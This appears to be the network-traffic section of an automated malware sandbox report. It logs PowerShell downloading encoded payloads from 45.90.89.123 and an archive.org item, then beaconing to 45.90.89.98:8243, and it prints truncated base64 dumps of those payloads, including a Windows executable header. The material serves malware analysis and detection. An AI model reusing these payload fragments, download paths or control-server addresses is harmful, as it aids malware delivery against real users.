                                                              Oct 2, 2024 05:29:28.496740103 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496784925 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496851921 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496866941 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496879101 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496886969 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496890068 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496902943 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496948004 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496948004 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496982098 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496998072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497009039 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497020960 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497047901 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.497047901 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.497076035 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497095108 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497106075 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497117043 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497138023 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497162104 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.497162104 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.551388025 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.919708967 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:28.924668074 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:28.924745083 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:28.931718111 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:28.936359882 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.936480045 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:50.329617977 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:50.329694986 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:50.329792023 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:50.334584951 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:51.333445072 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:51.338356972 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:51.338442087 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:51.341775894 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:51.347202063 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:12.684313059 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:12.684380054 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:12.684472084 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:12.689189911 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:13.692903996 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:13.697936058 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:13.698040009 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:13.701656103 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:13.707577944 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:35.061177969 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:35.061345100 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:35.061392069 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:35.066273928 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:36.067759991 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:36.072602987 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:36.072680950 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:36.076843977 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:36.081566095 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:57.500905037 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:57.500976086 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:57.501050949 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:57.505831957 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:58.505439043 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:58.510392904 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:58.510473967 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:58.514303923 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:58.519072056 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:19.894217968 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:19.894304991 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:19.894351006 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:19.899279118 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:20.896199942 CEST609018243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:20.901194096 CEST82436090145.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:20.901276112 CEST609018243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:20.906311989 CEST609018243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:20.911190033 CEST82436090145.90.89.98192.168.2.10

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 2, 2024 05:29:21.055444002 CEST5992753192.168.2.101.1.1.1
                                                              Oct 2, 2024 05:29:21.203010082 CEST53599271.1.1.1192.168.2.10
                                                              Oct 2, 2024 05:30:02.714600086 CEST5357638162.159.36.2192.168.2.10
                                                              Oct 2, 2024 05:30:03.203651905 CEST53594471.1.1.1192.168.2.10

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 2, 2024 05:29:21.055444002 CEST192.168.2.101.1.1.10x2b7cStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 2, 2024 05:29:21.203010082 CEST1.1.1.1192.168.2.100x2b7cNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • ia600100.us.archive.org
                                                              • 45.90.89.123

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.104970745.90.89.123807484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 2, 2024 05:29:26.972961903 CEST76OUTGET /2117/RMCCF.txt HTTP/1.1
                                                              Host: 45.90.89.123
                                                              Connection: Keep-Alive
                                                              Oct 2, 2024 05:29:27.676702976 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 02 Oct 2024 03:29:27 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                              Last-Modified: Thu, 19 Sep 2024 10:29:15 GMT
                                                              ETag: "a1000-6227664f1b339"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 659456
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain
                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                              Oct 2, 2024 05:29:27.676723957 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                              Oct 2, 2024 05:29:27.676738024 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                              Oct 2, 2024 05:29:27.676748991 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                              Oct 2, 2024 05:29:27.676759958 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                              Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                              Oct 2, 2024 05:29:27.676769972 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                              Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                              Oct 2, 2024 05:29:27.676783085 CEST776INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                              Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                              Oct 2, 2024 05:29:27.676836014 CEST1236INData Raw: 41 41 42 67 43 77 50 74 2b 54 6b 2b 51 6e 50 2b 30 7a 6b 39 4d 59 50 70 30 6a 42 38 41 4e 50 2b 79 7a 68 38 77 45 50 78 77 54 41 37 67 38 4f 54 74 54 52 37 41 30 4f 7a 73 54 48 37 63 77 4f 41 6f 7a 33 35 38 2b 4e 7a 66 7a 49 33 51 67 4e 69 62 44
                                                              Data Ascii: AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm
                                                              Oct 2, 2024 05:29:27.676847935 CEST1236INData Raw: 42 41 41 41 38 7a 34 2f 55 32 50 4f 35 44 75 2b 34 6d 50 57 35 7a 42 39 77 66 50 6a 32 6a 67 38 73 4e 50 4b 79 6a 64 38 73 47 50 67 78 7a 57 38 45 46 50 4d 78 6a 4d 38 63 78 4f 71 76 6a 30 37 6f 35 4f 30 74 7a 56 37 45 69 4f 33 72 44 32 34 6f 4c
                                                              Data Ascii: BAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLA
                                                              Oct 2, 2024 05:29:27.676866055 CEST1236INData Raw: 66 6a 34 33 34 39 4e 61 66 6a 31 33 49 39 4e 4f 66 6a 79 33 59 38 4e 43 66 6a 76 33 6f 37 4e 32 65 6a 73 33 34 36 4e 71 65 6a 70 33 49 36 4e 65 65 6a 6d 33 59 35 4e 53 65 6a 6a 33 6f 34 4e 47 65 6a 67 33 34 33 4e 36 64 6a 64 33 49 33 4e 75 64 6a
                                                              Data Ascii: fj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDf
                                                              Oct 2, 2024 05:29:27.681711912 CEST1236INData Raw: 51 70 4e 42 61 6a 4d 32 59 51 4e 6f 57 54 6c 31 6b 55 4e 44 56 6a 49 31 30 52 4e 54 55 44 43 30 34 50 4e 30 54 6a 37 30 67 4f 4e 69 54 44 33 30 6f 4d 4e 41 54 44 75 30 30 4b 4e 6e 53 54 6f 30 6f 49 4e 43 53 54 52 30 30 44 4e 76 51 54 4a 30 59 42
                                                              Data Ascii: QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAI


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1049706207.241.227.2404437484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-02 03:29:21 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                              Host: ia600100.us.archive.org
                                                              Connection: Keep-Alive
                                                              2024-10-02 03:29:22 UTC606INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Wed, 02 Oct 2024 03:29:22 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 2823512
                                                              Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                              Connection: close
                                                              ETag: "66e22cba-2b1558"
                                                              Strict-Transport-Security: max-age=15724800
                                                              Expires: Wed, 02 Oct 2024 09:29:22 GMT
                                                              Cache-Control: max-age=21600
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                              Access-Control-Allow-Credentials: true
                                                              Accept-Ranges: bytes
                                                              2024-10-02 03:29:22 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                              Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                              Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                              Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
